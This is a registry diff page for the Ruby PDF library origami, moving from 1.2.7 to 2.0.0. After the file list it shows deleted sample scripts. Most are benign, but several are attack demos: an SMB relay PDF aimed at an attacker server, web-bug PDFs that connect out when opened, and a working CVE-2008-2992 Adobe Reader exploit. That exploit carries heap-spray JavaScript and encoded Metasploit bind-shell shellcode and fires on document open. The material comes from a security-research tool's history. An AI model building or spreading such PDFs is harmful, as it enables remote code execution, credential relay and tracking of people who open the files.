RubyGems - origami - Versions diffs - 1.2.7 → 2.0.0 - Mend

origami 1.2.7 → 2.0.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (162) hide show

checksums.yaml +4 -4
data/CHANGELOG.md +66 -0
data/README.md +112 -0
data/bin/config/pdfcop.conf.yml +232 -233
data/bin/gui/about.rb +27 -37
data/bin/gui/config.rb +108 -117
data/bin/gui/file.rb +416 -365
data/bin/gui/gtkhex.rb +1138 -1153
data/bin/gui/hexview.rb +55 -57
data/bin/gui/imgview.rb +48 -51
data/bin/gui/menu.rb +388 -386
data/bin/gui/properties.rb +114 -130
data/bin/gui/signing.rb +571 -617
data/bin/gui/textview.rb +77 -95
data/bin/gui/treeview.rb +382 -387
data/bin/gui/walker.rb +227 -232
data/bin/gui/xrefs.rb +56 -60
data/bin/pdf2pdfa +53 -57
data/bin/pdf2ruby +212 -228
data/bin/pdfcop +338 -348
data/bin/pdfdecompress +58 -65
data/bin/pdfdecrypt +56 -60
data/bin/pdfencrypt +75 -80
data/bin/pdfexplode +185 -182
data/bin/pdfextract +201 -218
data/bin/pdfmetadata +83 -82
data/bin/pdfsh +4 -5
data/bin/pdfwalker +1 -2
data/bin/shell/.irbrc +45 -82
data/bin/shell/console.rb +105 -130
data/bin/shell/hexdump.rb +40 -64
data/examples/README.md +34 -0
data/examples/attachments/attachment.rb +38 -0
data/examples/attachments/nested_document.rb +51 -0
data/examples/encryption/encryption.rb +28 -0
data/{samples/actions/triggerevents/trigger.rb → examples/events/events.rb} +13 -16
data/examples/flash/flash.rb +37 -0
data/{samples → examples}/flash/helloworld.swf +0 -0
data/examples/forms/javascript.rb +54 -0
data/examples/forms/xfa.rb +115 -0
data/examples/javascript/hello_world.rb +22 -0
data/examples/javascript/js_emulation.rb +54 -0
data/examples/loop/goto.rb +32 -0
data/examples/loop/named.rb +33 -0
data/examples/signature/signature.rb +65 -0
data/examples/uri/javascript.rb +56 -0
data/examples/uri/open-uri.rb +21 -0
data/examples/uri/submitform.rb +47 -0
data/lib/origami.rb +29 -42
data/lib/origami/3d.rb +350 -225
data/lib/origami/acroform.rb +262 -288
data/lib/origami/actions.rb +268 -288
data/lib/origami/annotations.rb +697 -722
data/lib/origami/array.rb +258 -184
data/lib/origami/boolean.rb +74 -84
data/lib/origami/catalog.rb +397 -434
data/lib/origami/collections.rb +144 -0
data/lib/origami/destinations.rb +233 -194
data/lib/origami/dictionary.rb +253 -232
data/lib/origami/encryption.rb +1274 -1243
data/lib/origami/export.rb +232 -268
data/lib/origami/extensions/fdf.rb +307 -220
data/lib/origami/extensions/ppklite.rb +368 -435
data/lib/origami/filespec.rb +197 -0
data/lib/origami/filters.rb +301 -295
data/lib/origami/filters/ascii.rb +177 -180
data/lib/origami/filters/ccitt.rb +528 -535
data/lib/origami/filters/crypt.rb +26 -35
data/lib/origami/filters/dct.rb +46 -52
data/lib/origami/filters/flate.rb +95 -94
data/lib/origami/filters/jbig2.rb +49 -55
data/lib/origami/filters/jpx.rb +38 -44
data/lib/origami/filters/lzw.rb +189 -183
data/lib/origami/filters/predictors.rb +221 -235
data/lib/origami/filters/runlength.rb +103 -104
data/lib/origami/font.rb +173 -186
data/lib/origami/functions.rb +67 -81
data/lib/origami/graphics.rb +25 -21
data/lib/origami/graphics/colors.rb +178 -187
data/lib/origami/graphics/instruction.rb +79 -85
data/lib/origami/graphics/path.rb +142 -148
data/lib/origami/graphics/patterns.rb +160 -167
data/lib/origami/graphics/render.rb +43 -50
data/lib/origami/graphics/state.rb +138 -153
data/lib/origami/graphics/text.rb +188 -205
data/lib/origami/graphics/xobject.rb +819 -815
data/lib/origami/header.rb +63 -78
data/lib/origami/javascript.rb +596 -597
data/lib/origami/linearization.rb +285 -290
data/lib/origami/metadata.rb +139 -148
data/lib/origami/name.rb +112 -148
data/lib/origami/null.rb +53 -62
data/lib/origami/numeric.rb +162 -175
data/lib/origami/obfuscation.rb +186 -174
data/lib/origami/object.rb +593 -573
data/lib/origami/outline.rb +42 -47
data/lib/origami/outputintents.rb +73 -82
data/lib/origami/page.rb +703 -592
data/lib/origami/parser.rb +238 -290
data/lib/origami/parsers/fdf.rb +41 -33
data/lib/origami/parsers/pdf.rb +75 -95
data/lib/origami/parsers/pdf/lazy.rb +137 -0
data/lib/origami/parsers/pdf/linear.rb +64 -66
data/lib/origami/parsers/ppklite.rb +34 -70
data/lib/origami/pdf.rb +1030 -1005
data/lib/origami/reference.rb +102 -102
data/lib/origami/signature.rb +591 -609
data/lib/origami/stream.rb +668 -551
data/lib/origami/string.rb +397 -373
data/lib/origami/template/patterns.rb +56 -0
data/lib/origami/template/widgets.rb +151 -0
data/lib/origami/trailer.rb +144 -158
data/lib/origami/tree.rb +62 -0
data/lib/origami/version.rb +23 -0
data/lib/origami/webcapture.rb +88 -79
data/lib/origami/xfa.rb +2863 -2882
data/lib/origami/xreftable.rb +472 -384
data/test/dataset/calc.pdf +85 -0
data/test/dataset/crypto.pdf +82 -0
data/test/dataset/empty.pdf +49 -0
data/test/test_actions.rb +27 -0
data/test/test_annotations.rb +90 -0
data/test/test_pages.rb +31 -0
data/test/test_pdf.rb +16 -0
data/test/test_pdf_attachment.rb +34 -0
data/test/test_pdf_create.rb +24 -0
data/test/test_pdf_encrypt.rb +95 -0
data/test/test_pdf_parse.rb +96 -0
data/test/test_pdf_sign.rb +58 -0
data/test/test_streams.rb +182 -0
data/test/test_xrefs.rb +67 -0
metadata +88 -58
data/README +0 -67
data/bin/pdf2graph +0 -121
data/bin/pdfcocoon +0 -104
data/lib/origami/file.rb +0 -233
data/samples/README.txt +0 -45
data/samples/actions/launch/calc.rb +0 -87
data/samples/actions/launch/winparams.rb +0 -22
data/samples/actions/loop/loopgoto.rb +0 -24
data/samples/actions/loop/loopnamed.rb +0 -21
data/samples/actions/named/named.rb +0 -31
data/samples/actions/samba/smbrelay.rb +0 -26
data/samples/actions/webbug/submitform.js +0 -26
data/samples/actions/webbug/webbug-browser.rb +0 -68
data/samples/actions/webbug/webbug-js.rb +0 -67
data/samples/actions/webbug/webbug-reader.rb +0 -90
data/samples/attachments/attach.rb +0 -40
data/samples/attachments/attached.txt +0 -1
data/samples/crypto/crypto.rb +0 -28
data/samples/digsig/signed.rb +0 -46
data/samples/exploits/cve-2008-2992-utilprintf.rb +0 -87
data/samples/exploits/cve-2009-0927-geticon.rb +0 -65
data/samples/exploits/exploit_customdictopen.rb +0 -55
data/samples/exploits/getannots.rb +0 -69
data/samples/flash/flash.rb +0 -31
data/samples/javascript/attached.txt +0 -1
data/samples/javascript/js.rb +0 -52
data/templates/patterns.rb +0 -66
data/templates/widgets.rb +0 -173
data/templates/xdp.rb +0 -92
data/test/ts_pdf.rb +0 -50

data/samples/actions/samba/smbrelay.rb DELETED

@@ -1,26 +0,0 @@
-#!/usr/bin/ruby
-begin
-  require 'origami'
-rescue LoadError
-  ORIGAMIDIR = "#{File.dirname(__FILE__)}/../../../lib"
-  $: << ORIGAMIDIR
-  require 'origami'
-end
-include Origami
-#
-# SMB relay attack.
-# Uses a GoToR action to open a shared network directory.
-#
-ATTACKER_SERVER = "localhost"
-pdf = PDF.read(ARGV[0])
-dst = ExternalFile.new("\\\\#{ATTACKER_SERVER}\\origami\\owned.pdf")
-gotor = Action::GoToR[dst, Destination::GlobalFit.new(0), true]
-pdf.pages.first.onOpen(gotor)
-pdf.save("#{File.basename($0, '.rb')}.pdf")

data/samples/actions/webbug/submitform.js DELETED

@@ -1,26 +0,0 @@
-try
-{
-  app.alert("First, I try to launch your browser :)");
-  app.launchURL("http://localhost/webbug-browser.html");
-}
-catch(e)
-{
-}
-try
-{
-  app.alert("Now I try to connect to the website, through your Reader");
-  this.submitForm(
-  {
-    cURL: "http://localhost/webbug-reader.php",
-    bAnnotations: true,
-    bGet: true,
-    cSubmitAs: "XML"
-  });
-}
-catch(e)
-{
-}

data/samples/actions/webbug/webbug-browser.rb DELETED

@@ -1,68 +0,0 @@
-#!/usr/bin/ruby
-begin
-  require 'origami'
-rescue LoadError
-  ORIGAMIDIR = "#{File.dirname(__FILE__)}/../../../lib"
-  $: << ORIGAMIDIR
-  require 'origami'
-end
-include Origami
-OUTPUTFILE = "webbug-browser.pdf"
-puts "Now generating a new bugged PDF file from scratch!"
-URL = "http://localhost/webbug-browser.html"
-pdf = PDF.new
-contents = ContentStream.new
-contents.write "webbug-browser.pdf",
-  :x => 270, :y => 750, :rendering => Text::Rendering::STROKE, :size => 30
-contents.write "When opened, this PDF connects to \"home\"",
-  :x => 156, :y => 690, :rendering => Text::Rendering::FILL, :size => 15
-contents.write "Click \"Allow\":",
-  :x => 156, :y => 670, :size => 12
-contents.write "  1. Starts your default browser",
-  :x => 156, :y => 650, :size => 12
-contents.write "  1. Connects to #{URL}",
-  :x => 156, :y => 630, :size => 12
-contents.write "Comments:",
-  :x => 75, :y => 580, :rendering => Text::Rendering::FILL_AND_STROKE, :size => 14
-content = <<-EOS
-Windows:
-  - Foxit : opens the default browser without any user confirmation (!)
-  - Acrobat Reader 8: a pop-up spreads asking if it can connect, then Internet Explorer is connected.
-Mac:
-  - Preview: nothing happens
-  - Acrobat Reader 8: a pop-up spreads asking if it can connect, then Safari is connected
-Linux:
-  - poppler: nothing happens
-  - Acrobat Reader [7, 8]: a pop-up spreads asking if it can connect
-EOS
-contents.write content,
-  :x => 75, :y => 560, :rendering => Text::Rendering::FILL
-page = Page.new.setContents( contents )
-pdf.append_page(page)
-# Starting action
-pdf.onDocumentOpen Action::URI[URL]
-pdf.save(OUTPUTFILE)
-puts "PDF file saved as #{OUTPUTFILE}."

data/samples/actions/webbug/webbug-js.rb DELETED

@@ -1,67 +0,0 @@
-#!/usr/bin/ruby
-begin
-  require 'origami'
-rescue LoadError
-  ORIGAMIDIR = "#{File.dirname(__FILE__)}/../../../lib"
-  $: << ORIGAMIDIR
-  require 'origami'
-end
-include Origami
-OUTPUTFILE = "webbug-js.pdf"
-JSCRIPTFILE = "submitform.js"
-puts "Now generating a new PDF file from scratch!"
-contents = ContentStream.new.setFilter(:FlateDecode)
-contents.write OUTPUTFILE,
-  :x => 300, :y => 750, :rendering => Text::Rendering::STROKE, :size => 30
-contents.write "This PDF tries to connect through JavaScript calls :-D",
-  :x => 186, :y => 690, :rendering => Text::Rendering::FILL, :size => 15
-contents.write "The script first tries to run your browser, then it connects with the Reader.",
-  :x => 186, :y => 670, :size => 15
-contents.write "Comments:",
-  :x => 75, :y => 620, :rendering => Text::Rendering::FILL_AND_STROKE, :size => 14
-content = <<-EOS
-Windows:
-  - Acrobat Reader 8: Same behavior as with webbug-browser.pdf and webbug-reader.pdf.
-  - Foxit: Same behavior as with webbug-browser.pdf and webbug-reader.pdf, at the difference a popup appears
-      to ask for user confirmation before launching the browser. However the reader still connects to the site without
-      confirmation, as with webbug-reader.pdf
-Mac:
-Linux:
-  - Acrobat Reader 8: same behavior as Windows version.
-  - poppler-based viewers: not interpreting JavaScript : nothing happens.
-EOS
-contents.write content,
-  :x => 75, :y => 600, :rendering => Text::Rendering::FILL
-# A JS script to execute at the opening of the document
-jscript = File.open(JSCRIPTFILE).read
-pdf = PDF.new
-page = Page.new
-page.Contents = contents
-pdf.append_page(page)
-# Create a new action based on the script, compressed with zlib
-jsaction = Action::JavaScript Stream.new(jscript,:Filter => :FlateDecode)
-# Add the script into the document names dictionary. Any scripts registered here will be executed at the document opening (with no OpenAction implied).
-pdf.register(Names::Root::JAVASCRIPT, "Update", jsaction)
-# Save the resulting file
-pdf.save(OUTPUTFILE)
-puts "PDF file saved as #{OUTPUTFILE}."

data/samples/actions/webbug/webbug-reader.rb DELETED

@@ -1,90 +0,0 @@
-#!/usr/bin/ruby
-begin
-  require 'origami'
-rescue LoadError
-  ORIGAMIDIR = "#{File.dirname(__FILE__)}/../../../lib"
-  $: << ORIGAMIDIR
-  require 'origami'
-end
-include Origami
-OUTPUTFILE = "webbug-reader.pdf"
-URL = "http://localhost/webbug-reader.php"
-puts "Now generating a new bugged PDF file from scratch!"
-pdf = PDF.new
-contents = ContentStream.new
-contents.write "webbug-reader.pdf",
-  :x => 270, :y => 750, :rendering => Text::Rendering::STROKE, :size => 30
-contents.write "When opened, this PDF connects to \"home\"",
-  :x => 156, :y => 690, :rendering => Text::Rendering::FILL, :size => 15
-contents.write "Click \"Allow\" to connect to #{URL} through your current Reader.",
-  :x => 156, :y => 670, :size => 12
-contents.write "Comments:",
-  :x => 75, :y => 600, :rendering => Text::Rendering::FILL_AND_STROKE, :size => 14
-content = <<-EOS
-1. Open this pdf document (webbug-reader.pdf)
-2. The Reader connects to ${url}
-3. The web server returns the requested page:
-      <?php
-        header('Content-type: application/pdf');
-        readfile('calc.pdf');
-      ?>
-4. The Reader receives \"calc.pdf\" which is immediatly rendered
-5. A pop-up ask if it can execute the calc...
-Note: The URL where the Reader tries to connect is displayed
-Windows:
-  - Foxit : Nothing happens.
-  - Acrobat Reader 8: a popup appears for the user to allow the connection,
-      then the connection is made and a new window is opened with the 2nd document
-Mac:
-  - Preview: nothing happens
-  - Acrobat Reader 8: a popup appears for the user to allow the connection,
-      then the connection is made and a new window is opened with the 2nd document
-Linux:
-  - poppler: /SubmitForm is not supported
-  - Acrobat Reader 8: a popup appears for the user to allow the connection,
-      then the connection is made and a the document window is replaced with the 2nd document
-      Note: The 2 documents can be seen in the\"Window\" menu.
-  - Acrobat Reader 8: a popup appears for the user to allow the connection,
-      then the connection is made and a new window is opened with the 2nd document
-EOS
-contents.write content,
-  :x => 75, :y => 580, :rendering => Text::Rendering::FILL, :size => 12
-page = Page.new.setContents( contents )
-pdf.append_page( page )
-# Submit flags.
-flags = Action::SubmitForm::Flags::EXPORTFORMAT|Action::SubmitForm::Flags::GETMETHOD
-# Sends the form at the document opening.
-pdf.onDocumentOpen Action::SubmitForm[URL, [], flags]
-# Comments:
-#  - any port can be specified http://url:1234
-#  - does not follow the Redirect answers
-# Save the resulting file.
-pdf.save(OUTPUTFILE)
-puts "PDF file saved as #{OUTPUTFILE}."

data/samples/attachments/attach.rb DELETED

@@ -1,40 +0,0 @@
-#!/usr/bin/env ruby
-begin
-  require 'origami'
-rescue LoadError
-  ORIGAMIDIR = "#{File.dirname(__FILE__)}/../../lib"
-  $: << ORIGAMIDIR
-  require 'origami'
-end
-include Origami
-INPUTFILE = "attached.txt"
-OUTPUTFILE = "#{File.basename(__FILE__, ".rb")}.pdf"
-puts "Now generating a new PDF file from scratch!"
-# Creating a new file
-pdf = PDF.new
-# Embedding the file into the PDF.
-pdf.attach_file(INPUTFILE,
-  :EmbeddedName => "README.txt",
-  :Filter => :ASCIIHexDecode
-)
-contents = ContentStream.new
-contents.write "File attachment sample",
-  :x => 250, :y => 750, :rendering => Text::Rendering::FILL, :size => 30
-pdf.append_page Page.new.setContents(contents)
-pdf.onDocumentOpen Action::JavaScript <<JS
-  this.exportDataObject({cName:"README.txt", nLaunch:2});
-JS
-pdf.save(OUTPUTFILE)
-puts "PDF file saved as #{OUTPUTFILE}."

data/samples/attachments/attached.txt DELETED

	@@ -1 +0,0 @@
1	- *THIS IS THE EMBEDDED FILE*

data/samples/crypto/crypto.rb DELETED

@@ -1,28 +0,0 @@
-#!/usr/bin/env ruby
-begin
-  require 'origami'
-rescue LoadError
-  ORIGAMIDIR = "#{File.dirname(__FILE__)}/../../lib"
-  $: << ORIGAMIDIR
-  require 'origami'
-end
-include Origami
-OUTPUTFILE = "#{File.basename(__FILE__, ".rb")}.pdf"
-puts "Now generating a new PDF file from scratch!"
-# Creates an encrypted document with AES256 and a null password.
-pdf = PDF.new.encrypt(:cipher => 'aes', :key_size => 256)
-contents = ContentStream.new
-contents.write "Crypto sample",
-  :x => 350, :y => 750, :rendering => Text::Rendering::STROKE, :size => 30
-pdf.append_page Page.new.setContents(contents)
-pdf.save(OUTPUTFILE)
-puts "PDF file saved as #{OUTPUTFILE}."

data/samples/digsig/signed.rb DELETED

@@ -1,46 +0,0 @@
-#!/usr/bin/ruby
-require 'openssl'
-begin
-  require 'origami'
-rescue LoadError
-  ORIGAMIDIR = "#{File.dirname(__FILE__)}/../../lib"
-  $: << ORIGAMIDIR
-  require 'origami'
-end
-include Origami
-OUTPUTFILE = "#{File.basename(__FILE__, ".rb")}.pdf"
-CERTFILE = "test.crt"
-RSAKEYFILE = "test.key"
-contents = ContentStream.new.setFilter(:FlateDecode)
-contents.write OUTPUTFILE,
-  :x => 350, :y => 750, :rendering => Text::Rendering::STROKE, :size => 30
-pdf = PDF.new
-page = Page.new.setContents(contents)
-pdf.append_page(page)
-# Open certificate files
-cert = OpenSSL::X509::Certificate.new(File.open(CERTFILE).read)
-key = OpenSSL::PKey::RSA.new(File.open(RSAKEYFILE).read)
-sigannot = Annotation::Widget::Signature.new
-sigannot.Rect = Rectangle[:llx => 89.0, :lly => 386.0, :urx => 190.0, :ury => 353.0]
-page.add_annot(sigannot)
-# Sign the PDF with the specified keys
-pdf.sign(cert, key,
-  :method => 'adbe.pkcs7.sha1',
-  :annotation => sigannot,
-  :location => "France",
-  :contact => "fred@security-labs.org",
-  :reason => "Proof of Concept"
-)
-# Save the resulting file
-pdf.save(OUTPUTFILE)

data/samples/exploits/cve-2008-2992-utilprintf.rb DELETED

@@ -1,87 +0,0 @@
-#!/usr/bin/env ruby
-begin
-  require 'origami'
-rescue LoadError
-  ORIGAMIDIR = "#{File.dirname(__FILE__)}/../../lib"
-  $: << ORIGAMIDIR
-  require 'origami'
-end
-include Origami
-pdf = PDF.read(ARGV[0])
-# win32_bind -  EXITFUNC=seh LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com
-win32_bin = "%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949%u4949%u4949%u4949%u4949%u4949%u4937%u5a51%u436a%u3058%u3142%u4150%u6b42%u4141%u4153%u4132%u3241%u4142%u4230%u5841%u3850%u4241%u7875%u4b69%u724c%u584a%u526b%u4a6d%u4a48%u6b59%u6b4f%u694f%u416f%u4e70%u526b%u744c%u4164%u6e34%u376b%u5535%u4c6c%u714b%u646c%u6145%u7468%u6a41%u6e4f%u626b%u326f%u6c38%u334b%u376f%u5550%u7851%u316b%u6c59%u504b%u6e34%u466b%u6861%u456e%u6f61%u6c30%u6c59%u6b6c%u3934%u4150%u3764%u6877%u6941%u565a%u636d%u4b31%u7872%u6c6b%u7534%u566b%u3134%u5734%u5458%u6b35%u6e55%u336b%u556f%u7474%u7841%u416b%u4c76%u464b%u626c%u6e6b%u416b%u354f%u564c%u6861%u666b%u3663%u6c4c%u6b4b%u7239%u444c%u5764%u616c%u4f71%u4733%u6b41%u336b%u4c54%u634b%u7073%u6c30%u534b%u6470%u6c4c%u724b%u4550%u4e4c%u6c4d%u374b%u7530%u7358%u426e%u4c48%u524e%u466e%u586e%u566c%u3930%u586f%u7156%u4676%u7233%u6346%u3058%u7033%u3332%u5458%u5237%u4553%u5162%u504f%u4b54%u5a4f%u3370%u6a58%u686b%u596d%u456c%u466b%u4930%u596f%u7346%u4e6f%u5869%u7365%u4d56%u5851%u366d%u6468%u7242%u7275%u674a%u5972%u6e6f%u7230%u4a48%u5679%u6b69%u6e45%u764d%u6b37%u584f%u3356%u3063%u5053%u7653%u7033%u3353%u5373%u3763%u5633%u6b33%u5a4f%u3270%u5046%u3568%u7141%u304c%u3366%u6c63%u6d49%u6a31%u7035%u6e68%u3544%u524a%u4b50%u7177%u4b47%u4e4f%u3036%u526a%u3130%u7041%u5955%u6e6f%u3030%u6c68%u4c64%u546d%u796e%u3179%u5947%u596f%u4646%u6633%u6b35%u584f%u6350%u4b58%u7355%u4c79%u4146%u6359%u4b67%u784f%u7656%u5330%u4164%u3344%u7965%u4e6f%u4e30%u7173%u5878%u6167%u6969%u7156%u6269%u3977%u6a6f%u5176%u4945%u4e6f%u5130%u5376%u715a%u7274%u6246%u3048%u3063%u6c6d%u5a49%u6345%u625a%u7670%u3139%u5839%u4e4c%u4d69%u5337%u335a%u4e74%u4b69%u5652%u4b51%u6c70%u6f33%u495a%u336e%u4472%u6b6d%u374e%u7632%u6e4c%u6c73%u704d%u767a%u6c58%u4e6b%u4c4b%u736b%u5358%u7942%u6d6e%u7463%u6b56%u304f%u7075%u4b44%u794f%u5346%u706b%u7057%u7152%u5041%u4251%u4171%u337a%u4231%u4171%u5141%u6645%u6931%u5a6f%u5070%u6e68%u5a4d%u5679%u6865%u334e%u3963%u586f%u6356%u4b5a%u4b4f%u704f%u4b37%u4a4f%u4c70%u614b%u6b47%u4d4c%u6b53%u3174%u4974%u596f%u7046%u5952%u4e6f%u6330%u6c58%u6f30%u577a%u6174%u324f%u4b73%u684f%u3956%u386f%u4350"
-# linux/x86/shell_bind_tcp - 105 bytes
-# http://www.metasploit.com
-# Encoder: x86/shikata_ga_nai
-# AppendExit=false, PrependSetresuid=false,
-# PrependSetuid=false, LPORT=4444, RHOST=,
-# PrependSetreuid=false
-linux_bin = "%u7dbf%uca55%u2ba7%udbc9%ub1d3%ud914%u2474%u5bf4%ueb83%u31fc%u0e7b%u7b03%u9f0e%ufba0%ua87c%uafa8%u05c1%u5245%u484f%u3429%u0a82%ue711%u624e%u1559%u2e7e%u0acf%u9ed1%uca86%u78bb%uc1c1%u0dbc%uddb0%u090f%ub883%u91a2%uf4a0%u5c5b%u66a6%u34fa%ud098%u4830%u99af%u2032%u751f%ud8b0%ua637%u7154%u31a6%ud17b%ucb65%u619d%u0682%u41dd"
-shellcode = linux_bin
-jscript = %Q|
-/*
-From: http://www.milw0rm.com/exploits/7006
-Adobe Reader Javascript Printf Buffer Overflow Exploit
-===========================================================
-Reference: http://www.coresecurity.com/content/adobe-reader-buffer-overflow
-CVE-2008-2992
-Thanks to coresecurity for the technical background.
-6Nov,2008: Exploit released by me
-Credits: Debasis Mohanty
-www.hackingspirits.com
-www.coffeeandsecurity.com
-===========================================================
-//Exploit by Debasis Mohanty (aka nopsledge/Tr0y)
-//www.coffeeandsecurity
-//www.hackingspirits.com
-*/
-    app.alert("Prepare the spray");
-    var shellcode = unescape("#{shellcode}");
-    //Heap Spray starts here - Kiddos dont mess up with this
-    var nop ="";
-    for (i = 128;i >= 0; --i) nop += unescape("%u9090%u9090%u9090%u9090%u9090");
-    heapblock = nop + shellcode;
-    bigblock = unescape("%u9090%u9090");
-    headersize = 20;
-    spray = headersize+heapblock.length
-    while (bigblock.length<spray) bigblock+=bigblock;
-    fillblock = bigblock.substring(0, spray);
-    block = bigblock.substring(0, bigblock.length-spray);
-    while(block.length+spray < 0x40000) block = block+block+fillblock;
-    mem = new Array();
-    for (i=0;i<1400;i++) mem[i] = block + heapblock;
-    app.alert("Pull the trigger");
-// reference snippet from core security
-// http://www.coresecurity.com/content/adobe-reader-buffer-overflow
-var num = 12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888
-util.printf("%45000f",num);
-//    util.printf("%45000.45000f", 0);
-|
-exploit = Action::JavaScript Stream.new(jscript)
-pdf.onDocumentOpen( exploit )
-pdf.save("#{File.basename($0, '.rb')}.pdf")